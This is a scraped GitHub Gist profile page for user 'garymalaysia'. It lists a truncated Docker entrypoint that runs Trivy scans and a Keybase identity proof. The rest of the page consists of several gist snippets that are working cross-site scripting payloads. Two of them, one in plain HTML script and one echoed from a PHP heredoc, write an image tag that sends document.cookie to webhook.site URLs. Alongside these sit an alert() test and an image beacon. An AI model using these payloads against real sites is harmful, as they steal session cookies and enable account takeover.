Skip to content

Instantly share code, notes, and snippets.

@garymalaysia
garymalaysia / entrypoint.sh
Created April 22, 2022 13:24
Advance ENTRYPOINT for Docker Container
#!/bin/bash
set -o errexit
case $1 in
trivy)
case "$2" in
image|i|filesystem|fs|repo|repository)
echo ""
echo "########################"
echo " Scanning ......... "

Keybase proof

I hereby claim:

  • I am garymalaysia on github.
  • I am garythesnail (https://keybase.io/garythesnail) on keybase.
  • I have a public key ASAMmUWpVYD5EakGJHZEeaLdoJQSSjGGwYY9DFLFpb4nrQo

To claim this, I am signing this object:

<script>document.write('<img src="https://webhook.site/#!/b3011f4c-2491-49be-87a4-c5c44b780f10?cookie=YOU GUYS ARE THE BEST. HERE IS MY COOkie' + document.cookie +'"/>')</script>
alert('122222');
<img src="https://webhook.site./edf21f12-2530-49da-9a72-a9c65fbb7e16?example=NOTHING_HERE" >
<?php
$html = <<<EOF
<script>
document.write('<img src="http://webhook.site/c8169ecf-0b66-4835-bec9-a483fd449b15?cookie=YOU GUYS ARE THE BEST. HERE IS MY COOkie' + document.cookie +'"/>')
</script>
EOF;
echo $html;
?>